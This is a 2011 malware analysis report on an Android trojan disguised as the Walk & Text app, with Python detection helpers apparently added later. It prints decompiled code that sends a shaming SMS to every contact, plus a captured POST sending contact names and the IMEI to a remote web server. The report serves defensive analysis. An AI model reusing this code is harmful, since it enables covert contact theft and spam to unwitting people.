Malware Analysis Report - Kindsight

Dec 14, 2013 (3 years and 7 months ago)

Malware Analysis Report

Trojan:AndroidOS/Walk&Text

September 2011


Kevin McNamee

Kevin@kindsight.net

www.kindsight.net

Malware Analysis - Trojan:AndroidOS/Walk&Text
www.kindsight.net
Copyright © 2011 Kindsight, Inc.



Analysis Summary

Name: Trojan:AndroidOS/Walk&Text
MD5: c3a0f5d584cc2c3221bbd79486578208
Size: 2247671 bytes
Source: Indusface
File Type: Android Application
Application: com.incorporateapps.walktext
Version: 1.3.7
Sample Collected: 2011-08-02



Description:

This malware comes packaged as the Walk & Text application; however, the application contains no code to support any Walk&Text functionality. It pops up some scary dialog boxes, sends your contact list as a POST to http://incorporateapps.com/wat.php and sends SMS messages to everyone on your contact list saying:

“Hey,just downlaoded a pirated App off the Internet, Walk and Text for Android. Im stupid and cheap,it costed only 1 buck. Don't steal like I did!”

It’s not clear whether the message or the spelling is more embarrassing. Incorporate Apps have denied any association with the malware, although the contact list is sent to their web site.



Infection:

The phone is infected by installing the infected application. Most Android anti-virus applications detect this infection and warn you during the installation process.

Threat:

Medium

This malware does not appear to do any major damage but it does:

1. Send your contact list to a third-party web server.
2. Send SMS messages to your contact list.

The message is somewhat embarrassing, but harmless. It is not clear what the contact list is used for.

Remediation:

The threat can be removed manually by uninstalling the application. Most Android anti-virus applications will detect and remove this malware as well.



Detailed Analysis

The malware comes packaged as the Walk & Text application; however, the application contains no code to support any Walk&Text functionality. It pops up some scary dialog boxes, sends your contact list as a POST to http://incorporateapps.com/wat.php and sends SMS messages to your contact list warning about the evils of pirating software.




When executed it first displays a dialog indicating that it is somehow “cracking” the phone.


protected void onCreate(Bundle paramBundle)
{
    super.onCreate(paramBundle);
    int i = Log.e("test", "test");
    this.a = this;
    ProgressDialog localProgressDialog = ProgressDialog.show(this, "Processing", "Cracking...", 1, 0);
    this.b = localProgressDialog;
    e locale = new e(this);
    this.c = locale;
    this.c.start();
}




The dialog is shown below:




This is likely a ruse, because there does not appear to be any “cracking” done whatsoever.

A few seconds later it completes its operation with the following dialog box:






In the meantime it has sent your contact list as a POST to http://incorporateapps.com/wat.php

POST /wat.php HTTP/1.1
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
Host: incorporateapps.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Expect: 100-Continue

HTTP/1.1 100 Continue

SECOND_TABLE=1&phoneNumber=5556&imei=000000000000000&name=Jane+Doe

HTTP/1.1 200 OK
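
The capture above lends itself to a network-side check. The following Python is an added example, not part of the Kindsight report: it parses a captured request and flags form-encoded POSTs that carry device identifiers together with contact names. The function names and the choice of imei, phoneNumber and name as the matching fields are assumptions drawn from this one capture.

```python
from urllib.parse import parse_qs

# Constructed sample: the request from the capture above, with the interleaved
# server responses removed so only the client's bytes remain.
SAMPLE_REQUEST = (
    b"POST /wat.php HTTP/1.1\r\n"
    b"Content-Length: 66\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: incorporateapps.com\r\n"
    b"Connection: Keep-Alive\r\n"
    b"User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)\r\n"
    b"Expect: 100-Continue\r\n"
    b"\r\n"
    b"SECOND_TABLE=1&phoneNumber=5556&imei=000000000000000&name=Jane+Doe"
)

# Field names seen in the capture (assumption: these identify the upload).
DEVICE_FIELDS = {"imei", "phonenumber"}
CONTACT_FIELDS = {"name"}

def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body

def flag_contact_exfil(raw):
    """Return a finding if the request posts device IDs with contact data, else None."""
    method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "").lower()
    if method != "POST" or "x-www-form-urlencoded" not in ctype:
        return None
    fields = {k.lower(): v for k, v in parse_qs(body.decode("latin-1")).items()}
    device = sorted(DEVICE_FIELDS & set(fields))
    contact = sorted(CONTACT_FIELDS & set(fields))
    if not device or not contact:
        return None
    return {
        "host": headers.get("host"),
        "path": path,
        "device_fields": device,
        "contact_values": [v for f in contact for v in fields[f]],
        "length_ok": headers.get("content-length") == str(len(body)),
    }
```

Requiring both a device identifier and a contact field keeps ordinary form posts that merely contain a name field from matching.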


When you visit the site you get the following disclaimer:


Hello,

If you found your way to this page from some articles on the Internet explaining that this website collects private user information you are on the right place.

With the smallest detail that this php file was created on 22.03.2011 and we have logs to prove it!

We have added this page right after we found out about the article, this file was non-existent prior to this article as we were not aware that someone is trying to do bad publicity on our application!

We are looking into ways of filing a lawsuit against AVAST from CZECH REPUBLIC, company which has a vast interest in spreading fear in favor of their products! We are denied contact to any officials from that company and our calls are being blocked or ignored! We were never contacted by this company to this day, although our contact details are easily accessible to anyone and we have thousands of support tickets from our apps! Nobody from this Company ever bought any of our official applications prior to the article being published and they are using illegal software found on the internet we have no control over to base their materials on, way to go!

One can easily see that the signature on the cracked file is not our official signature and it is clearly that someone repackaged our file and spreads it on these torrents/fileservers.




There also appears to be code to send SMS messages to people on the contact list.


public final void run()
{
    try
    {
        LicenseCheck localLicenseCheck = this.b;
        String str1 = this.a;
        int i = Log.e("send sms", str1);
        Context localContext1 = localLicenseCheck.a;
        Intent localIntent1 = new Intent("SMS_SENT");
        PendingIntent localPendingIntent1 = PendingIntent.getBroadcast(localContext1, 0, localIntent1, 0);
        Context localContext2 = localLicenseCheck.a;
        Intent localIntent2 = new Intent("SMS_DELIVERED");
        PendingIntent localPendingIntent2 = PendingIntent.getBroadcast(localContext2, 0, localIntent2, 0);
        Context localContext3 = localLicenseCheck.a;
        d locald = new d(localLicenseCheck);
        IntentFilter localIntentFilter = new IntentFilter("SMS_DELIVERED");
        Intent localIntent3 = localContext3.registerReceiver(locald, localIntentFilter);

        SmsManager localSmsManager = SmsManager.getDefault();
        if ((str1 != null) && (str1.length() > 0) && (" Hey,just downlaoded a pirated App off the Internet, Walk and Text for Android. Im stupid and cheap,it costed only 1 buck.Don't steal like I did!".length() > 0))
            localSmsManager.sendTextMessage(str1, null, " Hey,just downlaoded a pirated App off the Internet, Walk and Text for Android. Im stupid and cheap,it costed only 1 buck.Don't steal like I did!", localPendingIntent1, localPendingIntent2);
        boolean bool = LicenseCheck.a(this.b).sendEmptyMessage(0);
        return;
    }


These messages were not observed in the test case, but that could have been due to a configuration issue
with the emulated phone.

Conclusion

This malware does not appear to do any major damage but it does:

1. Send your contact list to a third-party web server.
2. Send SMS messages to your contact list.

It is not clear what the contact list is used for.

Appendix

XML Manifest

<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="12" android:versionName="1.3.7"
    package="com.incorporateapps.walktext"
    xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:label="@string/app_name" android:icon="@drawable/icon">
        <activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen"
            android:name=".LicenseCheck" android:screenOrientation="landscape"
            android:noHistory="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen"
            android:name=".WalkText" android:screenOrientation="landscape" />
    </application>
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-feature android:name="android.hardware.camera" />
    <uses-feature android:name="android.hardware.camera.autofocus" />
    <uses-permission android:name="com.android.vending.CHECK_LICENSE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.VIBRATE" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.READ_LOGS" />
</manifest>
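
The manifest already declares what the behaviours described in this report need. The following Python is an added example, not part of the Kindsight report: it reads a decoded (text) manifest, reports the launcher activity and lists which of the report's behaviours the requested permissions allow. The rule names and the permission groupings are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: the manifest from the appendix, trimmed to the activities
# and the permissions this check looks at (XML declaration omitted).
SAMPLE_MANIFEST = """
<manifest android:versionCode="12" android:versionName="1.3.7"
    package="com.incorporateapps.walktext"
    xmlns:android="http://schemas.android.com/apk/res/android">
  <application android:label="@string/app_name">
    <activity android:name=".LicenseCheck">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".WalkText" />
  </application>
  <uses-permission android:name="android.permission.CAMERA" />
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.READ_CONTACTS" />
  <uses-permission android:name="android.permission.READ_PHONE_STATE" />
</manifest>"""

# Behaviours from the report mapped to the permissions each one needs
# (assumption: grouping chosen for this example).
RULES = {
    "contact list upload": {"READ_CONTACTS", "INTERNET"},
    "sms to contacts": {"READ_CONTACTS", "SEND_SMS"},
    "device identifier upload": {"READ_PHONE_STATE", "INTERNET"},
}

def triage(manifest_xml):
    """Return package, launcher activity and the behaviours the permissions allow."""
    root = ET.fromstring(manifest_xml)
    perms = {
        p.get(ANDROID_NS + "name", "").rsplit(".", 1)[-1]
        for p in root.iter("uses-permission")
    }
    launcher = None
    for activity in root.iter("activity"):
        cats = {c.get(ANDROID_NS + "name") for c in activity.iter("category")}
        if "android.intent.category.LAUNCHER" in cats:
            launcher = activity.get(ANDROID_NS + "name")
    enabled = sorted(name for name, need in RULES.items() if need <= perms)
    return {"package": root.get("package"), "launcher": launcher, "enabled": enabled}
```

On the sample, the launcher resolves to .LicenseCheck rather than .WalkText, and all three behaviours are permitted by the declared permissions.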